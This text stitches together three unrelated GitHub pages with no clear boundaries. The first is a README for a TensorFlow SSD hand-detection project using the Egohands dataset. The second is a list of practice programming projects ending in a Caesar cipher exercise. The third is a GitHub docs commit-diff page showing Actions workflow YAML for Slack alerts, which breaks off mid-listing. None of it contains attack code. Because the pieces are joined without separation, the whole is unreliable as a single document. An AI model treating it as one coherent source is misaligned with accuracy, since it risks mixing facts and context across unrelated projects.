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using Neural Networks (SSD) on Tensorflow. This repo documents steps and scripts used to train a hand detector using Tensorflow (Object Detection API). As with any DNN based task, the most expensive (and riskiest) part of the process has to do with finding or creating the right (annotated) dataset. I was interested mainly in detecting hands on a table (egocentric view point). I experimented first with the [Oxford Hands Dataset](http://www.robots.ox.ac.uk/~vgg/data/hands/) (the results were not good). I then tried the [Egohands Dataset](http://vision.soic.indiana.edu/projects/egohands/) which was a much better fit to my requirements. The goal of this repo/post is to demonstrate how neural networks can be applied to the (hard) problem of tracking hands (egocentric and other views). Better still, provide code that can be adapted to other uses cases. If you use this tutorial or models in your research or project, please cite [this](#citing-this-tutorial). Here is the detector in action. <img src="images/hand1.gif" width="33.3%"><img src="images/hand2.gif" width="33.3%"><img src="images/hand3.gif" width="33.3%"> Realtime detection on video stream from a webcam . <img src="images/chess1.gif" width="33.3%"><img src="images/chess2.gif" width="33.3%"><img src="images/chess3.gif" width="33.3%"> Detection on a Youtube video. Both examples above were run on a macbook pro **CPU** (i7, 2.5GHz, 16GB). Some fps numbers are: | FPS | Image Size | Device| Comments| | ------------- | ------------- | ------------- | ------------- | | 21 | 320 * 240 | Macbook pro (i7, 2.5GHz, 16GB) | Run without visualizing results| | 16 | 320 * 240 | Macbook pro (i7, 2.5GHz, 16GB) | Run while visualizing results (image above) | | 11 | 640 * 480 | Macbook pro (i7, 2.5GHz, 16GB) | Run while visualizing results (image above) | > Note: The code in this repo is written and tested with Tensorflow `1.4.0-rc0`. Using a different version may result in [some errors](https://github.com/tensorflow/models/issues/1581). You may need to [generate your own frozen model](https://pythonprogramming.net/testing-custom-object-detector-tensorflow-object-detection-api-tutorial/?completed=/training-custom-objects-tensorflow-object-detection-api-tutorial/) graph using the [model checkpoints](model-checkpoint) in the repo to fit your TF version. **Content of this document** - Motivation - Why Track/Detect hands with Neural Networks - Data preparation and network training in Tensorflow (Dataset, Import, Training) - Training the hand detection Model - Using the Detector to Detect/Track hands - Thoughts on Optimizations. > P.S if you are using or have used the models provided here, feel free to reach out on twitter ([@vykthur](https://twitter.com/vykthur)) and share your work! ## Motivation - Why Track/Detect hands with Neural Networks? There are several existing approaches to tracking hands in the computer vision domain. Incidentally, many of these approaches are rule based (e.g extracting background based on texture and boundary features, distinguishing between hands and background using color histograms and HOG classifiers,) making them not very robust. For example, these algorithms might get confused if the background is unusual or in situations where sharp changes in lighting conditions cause sharp changes in skin color or the tracked object becomes occluded.(see [here for a review](https://www.cse.unr.edu/~bebis/handposerev.pdf) paper on hand pose estimation from the HCI perspective) With sufficiently large datasets, neural networks provide opportunity to train models that perform well and address challenges of existing object tracking/detection algorithms - varied/poor lighting, noisy environments, diverse viewpoints and even occlusion. The main drawbacks to usage for real-time tracking/detection is that they can be complex, are relatively slow compared to tracking-only algorithms and it can be quite expensive to assemble a good dataset. But things are changing with advances in fast neural networks. Furthermore, this entire area of work has been made more approachable by deep learning frameworks (such as the tensorflow object detection api) that simplify the process of training a model for custom object detection. More importantly, the advent of fast neural network models like ssd, faster r-cnn, rfcn (see [here](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md#coco-trained-models-coco-models) ) etc make neural networks an attractive candidate for real-time detection (and tracking) applications. Hopefully, this repo demonstrates this. > If you are not interested in the process of training the detector, you can skip straight to applying the [pretrained model I provide in detecting hands](#detecting-hands). Training a model is a multi-stage process (assembling dataset, cleaning, splitting into training/test partitions and generating an inference graph). While I lightly touch on the details of these parts, there are a few other tutorials cover training a custom object detector using the tensorflow object detection api in more detail[ see [here](https://pythonprogramming.net/training-custom-objects-tensorflow-object-detection-api-tutorial/) and [here](https://towardsdatascience.com/how-to-train-your-own-object-detector-with-tensorflows-object-detector-api-bec72ecfe1d9) ]. I recommend you walk through those if interested in training a custom object detector from scratch. ## Data preparation and network training in Tensorflow (Dataset, Import, Training) **The Egohands Dataset** The hand detector model is built using data from the [Egohands Dataset](http://vision.soic.indiana.edu/projects/egohands/) dataset. This dataset works well for several reasons. It contains high quality, pixel level annotations (>15000 ground truth labels) where hands are located across 4800 images. All images are captured from an egocentric view (Google glass) across 48 different environments (indoor, outdoor) and activities (playing cards, chess, jenga, solving puzzles etc). <img src="images/egohandstrain.jpg" width="100%"> If you will be using the Egohands dataset, you can cite them as follows: > Bambach, Sven, et al. "Lending a hand: Detecting hands and recognizing activities in complex egocentric interactions." Proceedings of the IEEE International Conference on Computer Vision. 2015. The Egohands dataset (zip file with labelled data) contains 48 folders of locations where video data was collected (100 images per folder). ``` -- LOCATION_X -- frame_1.jpg -- frame_2.jpg ... -- frame_100.jpg -- polygons.mat // contains annotations for all 100 images in current folder -- LOCATION_Y -- frame_1.jpg -- frame_2.jpg ... -- frame_100.jpg -- polygons.mat // contains annotations for all 100 images in current folder ``` **Converting data to Tensorflow Format** Some initial work needs to be done to the Egohands dataset to transform it into the format (`tfrecord`) which Tensorflow needs to train a model. This repo contains `egohands_dataset_clean.py` a script that will help you generate these csv files. - Downloads the egohands datasets - Renames all files to include their directory names to ensure each filename is unique - Splits the dataset into train (80%), test (10%) and eval (10%) folders. - Reads in `polygons.mat` for each folder, generates bounding boxes and visualizes them to ensure correctness (see image above). - Once the script is done running, you should have an images folder containing three folders - train, test and eval. Each of these folders should also contain a csv label document each - `train_labels.csv`, `test_labels.csv` that can be used to generate `tfrecords` Note: While the egohands dataset provides four separate labels for hands (own left, own right, other left, and other right), for my purpose, I am only interested in the general `hand` class and label all training data as `hand`. You can modify the data prep script to generate `tfrecords` that support 4 labels. Next: convert your dataset + csv files to tfrecords. A helpful guide on this can be found [here](https://pythonprogramming.net/creating-tfrecord-files-tensorflow-object-detection-api-tutorial/).For each folder, you should be able to generate `train.record`, `test.record` required in the training process. ## Training the hand detection Model Now that the dataset has been assembled (and your tfrecords), the next task is to train a model based on this. With neural networks, it is possible to use a process called [transfer learning](https://www.tensorflow.org/tutorials/image_retraining) to shorten the amount of time needed to train the entire model. This means we can take an existing model (that has been trained well on a related domain (here image classification) and retrain its final layer(s) to detect hands for us. Sweet!. Given that neural networks sometimes have thousands or millions of parameters that can take weeks or months to train, transfer learning helps shorten training time to possibly hours. Tensorflow does offer a few models (in the tensorflow [model zoo](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md#coco-trained-models-coco-models)) and I chose to use the `ssd_mobilenet_v1_coco` model as my start point given it is currently (one of) the fastest models (read the SSD research [paper here](https://arxiv.org/pdf/1512.02325.pdf)). The training process can be done locally on your CPU machine which may take a while or better on a (cloud) GPU machine (which is what I did). For reference, training on my macbook pro (tensorflow compiled from source to take advantage of the mac's cpu architecture) the maximum speed I got was 5 seconds per step as opposed to the ~0.5 seconds per step I got with a GPU. For reference it would take about 12 days to run 200k steps on my mac (i7, 2.5GHz, 16GB) compared to ~5hrs on a GPU. > **Training on your own images**: Please use the [guide provided by Harrison from pythonprogramming](https://pythonprogramming.net/training-custom-objects-tensorflow-object-detection-api-tutorial/) on how to generate tfrecords given your label csv files and your images. The guide also covers how to start the training process if training locally. [see [here] (https://pythonprogramming.net/training-custom-objects-tensorflow-object-detection-api-tutorial/)]. If training in the cloud using a service like GCP, see the [guide here](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/running_on_cloud.md). As the training process progresses, the expectation is that total loss (errors) gets reduced to its possible minimum (about a value of 1 or thereabout). By observing the tensorboard graphs for total loss(see image below), it should be possible to get an idea of when the training process is complete (total loss does not decrease with further iterations/steps). I ran my training job for 200k steps (took about 5 hours) and stopped at a total Loss (errors) value of 2.575.(In retrospect, I could have stopped the training at about 50k steps and gotten a similar total loss value). With tensorflow, you can also run an evaluation concurrently that assesses your model to see how well it performs on the test data. A commonly used metric for performance is mean average precision (mAP) which is single number used to summarize the area under the precision-recall curve. mAP is a measure of how well the model generates a bounding box that has at least a 50% overlap with the ground truth bounding box in our test dataset. For the hand detector trained here, the mAP value was **0.9686@0.5IOU**. mAP values range from 0-1, the higher the better. <img src="images/accuracy.jpg" width="100%"> Once training is completed, the trained inference graph (`frozen_inference_graph.pb`) is then exported (see the earlier referenced guides for how to do this) and saved in the `hand_inference_graph` folder. Now its time to do some interesting detection. ## Using the Detector to Detect/Track hands If you have not done this yet, please following the guide on installing [Tensorflow and the Tensorflow object detection api](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/installation.md). This will walk you through setting up the tensorflow framework, cloning the tensorflow github repo and a guide on - Load the `frozen_inference_graph.pb` trained on the hands dataset as well as the corresponding label map. In this repo, this is done in the `utils/detector_utils.py` script by the `load_inference_graph` method. ```python detection_graph = tf.Graph() with detection_graph.as_default(): od_graph_def = tf.GraphDef() with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: serialized_graph = fid.read() od_graph_def.ParseFromString(serialized_graph) tf.import_graph_def(od_graph_def, name='') sess = tf.Session(graph=detection_graph) print("> ====== Hand Inference graph loaded.") ``` - Detect hands. In this repo, this is done in the `utils/detector_utils.py` script by the `detect_objects` method. ```python (boxes, scores, classes, num) = sess.run( [detection_boxes, detection_scores, detection_classes, num_detections], feed_dict={image_tensor: image_np_expanded}) ``` - Visualize detected bounding detection_boxes. In this repo, this is done in the `utils/detector_utils.py` script by the `draw_box_on_image` method. This repo contains two scripts that tie all these steps together. - detect_multi_threaded.py : A threaded implementation for reading camera video input detection and detecting. Takes a set of command line flags to set parameters such as `--display` (visualize detections), image parameters `--width` and `--height`, videe `--source` (0 for camera) etc. - detect_single_threaded.py : Same as above, but single threaded. This script works for video files by setting the video source parameter videe `--source` (path to a video file). ```cmd # load and run detection on video at path "videos/chess.mov" python detect_single_threaded.py --source videos/chess.mov ``` > Update: If you do have errors loading the frozen inference graph in this repo, feel free to generate a new graph that fits your TF version from the model-checkpoint in this repo. Use the [export_inference_graph.py](https://github.com/tensorflow/models/blob/master/research/object_detection/export_inference_graph.py) script provided in the tensorflow object detection api repo. More guidance on this [here](https://pythonprogramming.net/testing-custom-object-detector-tensorflow-object-detection-api-tutorial/?completed=/training-custom-objects-tensorflow-object-detection-api-tutorial/). ## Thoughts on Optimization. A few things that led to noticeable performance increases. - Threading: Turns out that reading images from a webcam is a heavy I/O event and if run on the main application thread can slow down the program. I implemented some good ideas from [Adrian Rosebuck](https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/) on parrallelizing image capture across multiple worker threads. This mostly led to an FPS increase of about 5 points. - For those new to Opencv, images from the `cv2.read()` method return images in [BGR format](https://www.learnopencv.com/why-does-opencv-use-bgr-color-format/). Ensure you convert to RGB before detection (accuracy will be much reduced if you dont). ```python cv2.cvtColor(image_np, cv2.COLOR_BGR2RGB) ``` - Keeping your input image small will increase fps without any significant accuracy drop.(I used about 320 x 240 compared to the 1280 x 720 which my webcam provides). - Model Quantization. Moving from the current 32 bit to 8 bit can achieve up to 4x reduction in memory required to load and store models. One way to further speed up this model is to explore the use of [8-bit fixed point quantization](https://heartbeat.fritz.ai/8-bit-quantization-and-tensorflow-lite-speeding-up-mobile-inference-with-low-precision-a882dfcafbbd). Performance can also be increased by a clever combination of tracking algorithms with the already decent detection and this is something I am still experimenting with. Have ideas for optimizing better, please share! <img src="images/general.jpg" width="100%"> Note: The detector does reflect some limitations associated with the training set. This includes non-egocentric viewpoints, very noisy backgrounds (e.g in a sea of hands) and sometimes skin tone. There is opportunity to improve these with additional data. ## Integrating Multiple DNNs. One way to make things more interesting is to integrate our new knowledge of where "hands" are with other detectors trained to recognize other objects. Unfortunately, while our hand detector can in fact detect hands, it cannot detect other objects (a factor or how it is trained). To create a detector that classifies multiple different objects would mean a long involved process of assembling datasets for each class and a lengthy training process. > Given the above, a potential strategy is to explore structures that allow us **efficiently** interleave output form multiple pretrained models for various object classes and have them detect multiple objects on a single image. An example of this is with my primary use case where I am interested in understanding the position of objects on a table with respect to hands on same table. I am currently doing some work on a threaded application that loads multiple detectors and outputs bounding boxes on a single image. More on this soon.
ManojKumarPatnaik
A list of practical projects that anyone can solve in any programming language (See solutions). These projects are divided into multiple categories, and each category has its own folder. To get started, simply fork this repo. CONTRIBUTING See ways of contributing to this repo. You can contribute solutions (will be published in this repo) to existing problems, add new projects, or remove existing ones. Make sure you follow all instructions properly. Solutions You can find implementations of these projects in many other languages by other users in this repo. Credits Problems are motivated by the ones shared at: Martyr2’s Mega Project List Rosetta Code Table of Contents Numbers Classic Algorithms Graph Data Structures Text Networking Classes Threading Web Files Databases Graphics and Multimedia Security Numbers Find PI to the Nth Digit - Enter a number and have the program generate PI up to that many decimal places. Keep a limit to how far the program will go. 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For added complexity, add an option for users to select the compounding interval (Monthly, Weekly, Daily, Continually). Change Return Program - The user enters a cost and then the amount of money given. The program will figure out the change and the number of quarters, dimes, nickels, pennies needed for the change. Binary to Decimal and Back Converter - Develop a converter to convert a decimal number to binary or a binary number to its decimal equivalent. Calculator - A simple calculator to do basic operators. Make it a scientific calculator for added complexity. Unit Converter (temp, currency, volume, mass, and more) - Converts various units between one another. The user enters the type of unit being entered, the type of unit they want to convert to, and then the value. The program will then make the conversion. Alarm Clock - A simple clock where it plays a sound after X number of minutes/seconds or at a particular time. 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Coin Flip Simulation - Write some code that simulates flipping a single coin however many times the user decides. The code should record the outcomes and count the number of tails and heads. Limit Calculator - Ask the user to enter f(x) and the limit value, then return the value of the limit statement Optional: Make the calculator capable of supporting infinite limits. Fast Exponentiation - Ask the user to enter 2 integers a and b and output a^b (i.e. pow(a,b)) in O(LG n) time complexity. Classic Algorithms Collatz Conjecture - Start with a number n > 1. Find the number of steps it takes to reach one using the following process: If n is even, divide it by 2. If n is odd, multiply it by 3 and add 1. Sorting - Implement two types of sorting algorithms: Merge sort and bubble sort. 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Country from IP Lookup - Enter an IP address and find the country that IP is registered in. Optional: Find the Ip automatically. Whois Search Tool - Enter an IP or host address and have it look it up through whois and return the results to you. Site Checker with Time Scheduling - An application that attempts to connect to a website or server every so many minute or a given time and check if it is up. If it is down, it will notify you by email or by posting a notice on the screen. Classes Product Inventory Project - Create an application that manages an inventory of products. Create a product class that has a price, id, and quantity on hand. Then create an inventory class that keeps track of various products and can sum up the inventory value. Airline / Hotel Reservation System - Create a reservation system that books airline seats or hotel rooms. It charges various rates for particular sections of the plane or hotel. For example, first class is going to cost more than a coach. Hotel rooms have penthouse suites which cost more. Keep track of when rooms will be available and can be scheduled. Company Manager - Create a hierarchy of classes - abstract class Employee and subclasses HourlyEmployee, SalariedEmployee, Manager, and Executive. Everyone's pay is calculated differently, research a bit about it. After you've established an employee hierarchy, create a Company class that allows you to manage the employees. You should be able to hire, fire, and raise employees. Bank Account Manager - Create a class called Account which will be an abstract class for three other classes called CheckingAccount, SavingsAccount, and BusinessAccount. Manage credits and debits from these accounts through an ATM-style program. Patient / Doctor Scheduler - Create a patient class and a doctor class. Have a doctor that can handle multiple patients and set up a scheduling program where a doctor can only handle 16 patients during an 8 hr workday. Recipe Creator and Manager - Create a recipe class with ingredients and put them in a recipe manager program that organizes them into categories like desserts, main courses, or by ingredients like chicken, beef, soups, pies, etc. Image Gallery - Create an image abstract class and then a class that inherits from it for each image type. Put them in a program that displays them in a gallery-style format for viewing. Shape Area and Perimeter Classes - Create an abstract class called Shape and then inherit from it other shapes like diamond, rectangle, circle, triangle, etc. Then have each class override the area and perimeter functionality to handle each shape type. Flower Shop Ordering To Go - Create a flower shop application that deals in flower objects and use those flower objects in a bouquet object which can then be sold. Keep track of the number of objects and when you may need to order more. Family Tree Creator - Create a class called Person which will have a name, when they were born, and when (and if) they died. Allow the user to create these Person classes and put them into a family tree structure. Print out the tree to the screen. Threading Create A Progress Bar for Downloads - Create a progress bar for applications that can keep track of a download in progress. The progress bar will be on a separate thread and will communicate with the main thread using delegates. Bulk Thumbnail Creator - Picture processing can take a bit of time for some transformations. Especially if the image is large. Create an image program that can take hundreds of images and converts them to a specified size in the background thread while you do other things. For added complexity, have one thread handling re-sizing, have another bulk renaming of thumbnails, etc. Web Page Scraper - Create an application that connects to a site and pulls out all links, or images, and saves them to a list. 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E-Card Generator - Make a site that allows people to generate their own little e-cards and send them to other people. Do not use Flash. Use a picture library and perhaps insightful mottos or quotes. Content Management System - Create a content management system (CMS) like Joomla, Drupal, PHP Nuke, etc. Start small. Optional: Allow for the addition of modules/addons. Web Board (Forum) - Create a forum for you and your buddies to post, administer and share thoughts and ideas. CAPTCHA Maker - Ever see those images with letters numbers when you signup for a service and then ask you to enter what you see? It keeps web bots from automatically signing up and spamming. Try creating one yourself for online forms. Files Quiz Maker - Make an application that takes various questions from a file, picked randomly, and puts together a quiz for students. Each quiz can be different and then reads a key to grade the quizzes. Sort Excel/CSV File Utility - Reads a file of records, sorts them, and then writes them back to the file. Allow the user to choose various sort style and sorting based on a particular field. Create Zip File Maker - The user enters various files from different directories and the program zips them up into a zip file. Optional: Apply actual compression to the files. Start with Huffman Algorithm. PDF Generator - An application that can read in a text file, HTML file, or some other file and generates a PDF file out of it. Great for a web-based service where the user uploads the file and the program returns a PDF of the file. Optional: Deploy on GAE or Heroku if possible. Mp3 Tagger - Modify and add ID3v1 tags to MP3 files. See if you can also add in the album art into the MP3 file’s header as well as other ID3v2 tags. Code Snippet Manager - Another utility program that allows coders to put in functions, classes, or other tidbits to save for use later. Organized by the type of snippet or language the coder can quickly lookup code. Optional: For extra practice try adding syntax highlighting based on the language. Databases SQL Query Analyzer - A utility application in which a user can enter a query and have it run against a local database and look for ways to make it more efficient. Remote SQL Tool - A utility that can execute queries on remote servers from your local computer across the Internet. It should take in a remote host, user name, and password, run the query and return the results. Report Generator - Create a utility that generates a report based on some tables in a database. Generates sales reports based on the order/order details tables or sums up the day's current database activity. Event Scheduler and Calendar - Make an application that allows the user to enter a date and time of an event, event notes, and then schedule those events on a calendar. The user can then browse the calendar or search the calendar for specific events. Optional: Allow the application to create re-occurrence events that reoccur every day, week, month, year, etc. Budget Tracker - Write an application that keeps track of a household’s budget. The user can add expenses, income, and recurring costs to find out how much they are saving or losing over a period of time. Optional: Allow the user to specify a date range and see the net flow of money in and out of the house budget for that time period. TV Show Tracker - Got a favorite show you don’t want to miss? Don’t have a PVR or want to be able to find the show to then PVR it later? Make an application that can search various online TV Guide sites, locate the shows/times/channels and add them to a database application. The database/website then can send you email reminders that a show is about to start and which channel it will be on. Travel Planner System - Make a system that allows users to put together their own little travel itinerary and keep track of the airline/hotel arrangements, points of interest, budget, and schedule. Graphics and Multimedia Slide Show - Make an application that shows various pictures in a slide show format. Optional: Try adding various effects like fade in/out, star wipe, and window blinds transitions. Stream Video from Online - Try to create your own online streaming video player. Mp3 Player - A simple program for playing your favorite music files. Add features you think are missing from your favorite music player. Watermarking Application - Have some pictures you want copyright protected? Add your own logo or text lightly across the background so that no one can simply steal your graphics off your site. Make a program that will add this watermark to the picture. Optional: Use threading to process multiple images simultaneously. Turtle Graphics - This is a common project where you create a floor of 20 x 20 squares. Using various commands you tell a turtle to draw a line on the floor. You have moved forward, left or right, lift or drop the pen, etc. Do a search online for "Turtle Graphics" for more information. Optional: Allow the program to read in the list of commands from a file. GIF Creator A program that puts together multiple images (PNGs, JPGs, TIFFs) to make a smooth GIF that can be exported. Optional: Make the program convert small video files to GIFs as well. Security Caesar cipher - Implement a Caesar cipher, both encoding, and decoding. The key is an integer from 1 to 25. This cipher rotates the letters of the alphabet (A to Z). The encoding replaces each letter with the 1st to 25th next letter in the alphabet (wrapping Z to A). So key 2 encrypts "HI" to "JK", but key 20 encrypts "HI" to "BC". This simple "monoalphabetic substitution cipher" provides almost no security, because an attacker who has the encoded message can either use frequency analysis to guess the key, or just try all 25 keys.
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Skip to content github / docs Code Issues 80 Pull requests 35 Discussions Actions Projects 2 Security Insights Merge branch 'main' into 1862-Add-Travis-CI-migration-table 1862-Add-Travis-CI-migration-table (#1869, Iixixi/ZachryTylerWood#102, THEBOLCK79/docs#1, sbnbhk/docs#1) @martin389 martin389 committed on Dec 9, 2020 2 parents 2f9ec0c + 1588f50 commit 1a56ed136914e522f3a23ecc2be1c49f479a1a6a Showing 501 changed files with 5,397 additions and 1,362 deletions. 2 .github/allowed-actions.js @@ -30,7 +30,7 @@ module.exports = [ 'rachmari/labeler@832d42ec5523f3c6d46e8168de71cd54363e3e2e', 'repo-sync/github-sync@3832fe8e2be32372e1b3970bbae8e7079edeec88', 'repo-sync/pull-request@33777245b1aace1a58c87a29c90321aa7a74bd7d', 'rtCamp/action-slack-notify@e17352feaf9aee300bf0ebc1dfbf467d80438815', 'someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd', 'tjenkinson/gh-action-auto-merge-dependency-updates@cee2ac0', 'EndBug/add-and-commit@9358097a71ad9fb9e2f9624c6098c89193d83575' ] 72 .github/workflows/confirm-internal-staff-work-in-docs.yml @@ -0,0 +1,72 @@ name: Confirm internal staff meant to post in public on: issues: types: - opened - reopened - transferred pull_request_target: types: - opened - reopened jobs: check-team-membership: runs-on: ubuntu-latest continue-on-error: true if: github.repository == 'github/docs' steps: - uses: actions/github-script@626af12fe9a53dc2972b48385e7fe7dec79145c9 with: github-token: ${{ secrets.DOCUBOT_FR_PROJECT_BOARD_WORKFLOWS_REPO_ORG_READ_SCOPES }} script: | // Only perform this action with GitHub employees try { await github.teams.getMembershipForUserInOrg({ org: 'github', team_slug: 'employees', username: context.payload.sender.login, }); } catch(err) { // An error will be thrown if the user is not a GitHub employee // If a user is not a GitHub employee, we should stop here and // Not send a notification return } // Don't perform this action with Docs team members try { await github.teams.getMembershipForUserInOrg({ org: 'github', team_slug: 'docs', username: context.payload.sender.login, }); // If the user is a Docs team member, we should stop here and not send // a notification return } catch(err) { // An error will be thrown if the user is not a Docs team member // If a user is not a Docs team member we should continue and send // the notification } const issueNo = context.number || context.issue.number // Create an issue in our private repo await github.issues.create({ owner: 'github', repo: 'docs-internal', title: `@${context.payload.sender.login} confirm that \#${issueNo} should be in the public github/docs repo`, body: `@${context.payload.sender.login} opened https://github.com/github/docs/issues/${issueNo} publicly in the github/docs repo, instead of the private github/docs-internal repo.\n\n@${context.payload.sender.login}, please confirm that this belongs in the public repo and that no sensitive information was disclosed by commenting below and closing the issue.\n\nIf this was not intentional and sensitive information was shared, please delete https://github.com/github/docs/issues/${issueNo} and notify us in the \#docs-open-source channel.\n\nThanks! \n\n/cc @github/docs @github/docs-engineering` }); throw new Error('A Hubber opened an issue on the public github/docs repo'); - name: Send Slack notification if a GitHub employee who isn't on the docs team opens an issue in public if: ${{ failure() && github.repository == 'github/docs' }} uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd with: channel: ${{ secrets.DOCS_OPEN_SOURCE_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} text: <@${{github.actor}}> opened https://github.com/github/docs/issues/${{ github.event.number || github.event.issue.number }} publicly on the github/docs repo instead of the private github/docs-internal repo. They have been notified via a new issue in the github/docs-internal repo to confirm this was intentional. 15 .github/workflows/js-lint.yml @@ -10,23 +10,8 @@ on: - translations jobs: see_if_should_skip: runs-on: ubuntu-latest outputs: should_skip: ${{ steps.skip_check.outputs.should_skip }} steps: - id: skip_check uses: fkirc/skip-duplicate-actions@36feb0d8d062137530c2e00bd278d138fe191289 with: cancel_others: 'false' github_token: ${{ github.token }} paths: '["**/*.js", "package*.json", ".github/workflows/js-lint.yml", ".eslint*"]' lint: runs-on: ubuntu-latest needs: see_if_should_skip if: ${{ needs.see_if_should_skip.outputs.should_skip != 'true' }} steps: - name: Check out repo uses: actions/checkout@5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f 13 .github/workflows/repo-freeze-reminders.yml @@ -14,11 +14,10 @@ jobs: if: github.repository == 'github/docs-internal' steps: - name: Send Slack notification if repo is frozen uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd if: ${{ env.FREEZE == 'true' }} uses: rtCamp/action-slack-notify@e17352feaf9aee300bf0ebc1dfbf467d80438815 env: SLACK_WEBHOOK: ${{ secrets.DOCS_ALERTS_SLACK_WEBHOOK }} SLACK_USERNAME: docs-repo-sync SLACK_ICON_EMOJI: ':freezing_face:' SLACK_COLOR: '#51A0D5' # Carolina Blue SLACK_MESSAGE: All repo-sync runs will fail for ${{ github.repository }} because the repo is currently frozen! with: channel: ${{ secrets.DOCS_ALERTS_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} color: info text: All repo-sync runs will fail for ${{ github.repository }} because the repo is currently frozen! 54 .github/workflows/repo-sync-stalls.yml @@ -0,0 +1,54 @@ name: Repo Sync Stalls on: workflow_dispatch: schedule: - cron: '*/30 * * * *' jobs: check-freezer: name: Check for deployment freezes runs-on: ubuntu-latest steps: - name: Exit if repo is frozen if: ${{ env.FREEZE == 'true' }} run: | echo 'The repo is currently frozen! Exiting this workflow.' exit 1 # prevents further steps from running repo-sync-stalls: runs-on: ubuntu-latest steps: - name: Check if repo sync is stalled uses: actions/github-script@626af12fe9a53dc2972b48385e7fe7dec79145c9 with: github-token: ${{ secrets.DOCUBOT_FR_PROJECT_BOARD_WORKFLOWS_REPO_ORG_READ_SCOPES }} script: | let pulls; const owner = context.repo.owner const repo = context.repo.repo try { pulls = await github.pulls.list({ owner: owner, repo: repo, head: `${owner}:repo-sync`, state: 'open' }); } catch(err) { throw err return } pulls.data.forEach(pr => { const timeDelta = Date.now() - Date.parse(pr.created_at); const minutesOpen = timeDelta / 1000 / 60; if (minutesOpen > 30) { core.setFailed('Repo sync appears to be stalled') } }) - name: Send Slack notification if workflow fails uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd if: failure() with: channel: ${{ secrets.DOCS_ALERTS_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} color: failure text: Repo sync appears to be stalled for ${{github.repository}}. See https://github.com/${{github.repository}}/pulls?q=is%3Apr+is%3Aopen+repo+sync 16 .github/workflows/repo-sync.yml @@ -7,6 +7,7 @@ name: Repo Sync on: workflow_dispatch: schedule: - cron: '*/15 * * * *' # every 15 minutes @@ -70,11 +71,10 @@ jobs: number: ${{ steps.find-pull-request.outputs.number }} - name: Send Slack notification if workflow fails uses: rtCamp/action-slack-notify@e17352feaf9aee300bf0ebc1dfbf467d80438815 if: ${{ failure() }} env: SLACK_WEBHOOK: ${{ secrets.DOCS_ALERTS_SLACK_WEBHOOK }} SLACK_USERNAME: docs-repo-sync SLACK_ICON_EMOJI: ':ohno:' SLACK_COLOR: '#B90E0A' # Crimson SLACK_MESSAGE: The last repo-sync run for ${{github.repository}} failed. See https://github.com/${{github.repository}}/actions?query=workflow%3A%22Repo+Sync%22 uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd if: failure() with: channel: ${{ secrets.DOCS_ALERTS_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} color: failure text: The last repo-sync run for ${{github.repository}} failed. See https://github.com/${{github.repository}}/actions?query=workflow%3A%22Repo+Sync%22 10 .github/workflows/sync-algolia-search-indices.yml @@ -33,8 +33,10 @@ jobs: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: npm run sync-search - name: Send slack notification if workflow run fails uses: rtCamp/action-slack-notify@e17352feaf9aee300bf0ebc1dfbf467d80438815 uses: someimportantcompany/github-actions-slack-message@0b470c14b39da4260ed9e3f9a4f1298a74ccdefd if: failure() env: SLACK_WEBHOOK: ${{ secrets.DOCS_ALERTS_SLACK_WEBHOOK }} SLACK_MESSAGE: The last Algolia workflow run for ${{github.repository}} failed. Search actions for `workflow:Algolia` with: channel: ${{ secrets.DOCS_ALERTS_SLACK_CHANNEL_ID }} bot-token: ${{ secrets.SLACK_DOCS_BOT_TOKEN }} color: failure text: The last Algolia workflow run for ${{github.repository}} failed. Search actions for `workflow:Algolia` 15 .github/workflows/yml-lint.yml @@ -10,23 +10,8 @@ on: - translations jobs: see_if_should_skip: runs-on: ubuntu-latest outputs: should_skip: ${{ steps.skip_check.outputs.should_skip }} steps: - id: skip_check uses: fkirc/skip-duplicate-actions@36feb0d8d062137530c2e00bd278d138fe191289 with: cancel_others: 'false' github_token: ${{ github.token }} paths: '["**/*.yml", "**/*.yaml", "package*.json", ".github/workflows/yml-lint.yml"]' lint: runs-on: ubuntu-latest needs: see_if_should_skip if: ${{ needs.see_if_should_skip.outputs.should_skip != 'true' }} steps: - name: Check out repo uses: actions/checkout@5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f 4 README.md @@ -28,7 +28,7 @@ If you've found a problem, you can open an issue using a [template](https://gith #### Solve an issue If you have a solution to one of the open issues, you will need to fork the repository and submit a PR using the [template](https://github.com/github/docs/blob/main/CONTRIBUTING.md#pull-request-template) that is visible automatically in the pull request body. For more details about this process, please check out [Getting Started with Contributing](/CONTRIBUTING.md). If you have a solution to one of the open issues, you will need to fork the repository and submit a pull request using the [template](https://github.com/github/docs/blob/main/CONTRIBUTING.md#pull-request-template) that is visible automatically in the pull request body. For more details about this process, please check out [Getting Started with Contributing](/CONTRIBUTING.md). #### Join us in discussions @@ -50,6 +50,8 @@ There are a few more things to know when you're getting started with this repo: In addition to the README you're reading right now, this repo includes other READMEs that describe the purpose of each subdirectory in more detail: - [content/README.md](content/README.md) - [content/graphql/README.md](content/graphql/README.md) - [content/rest/README.md](content/rest/README.md) - [contributing/README.md](contributing/README.md) - [data/README.md](data/README.md) - [data/reusables/README.md](data/reusables/README.md) BIN +164 KB assets/images/help/classroom/assignment-group-hero.png Binary file not shown. BIN +75.5 KB assets/images/help/classroom/assignment-ide-go-grant-access-button.png Binary file not shown. BIN +175 KB 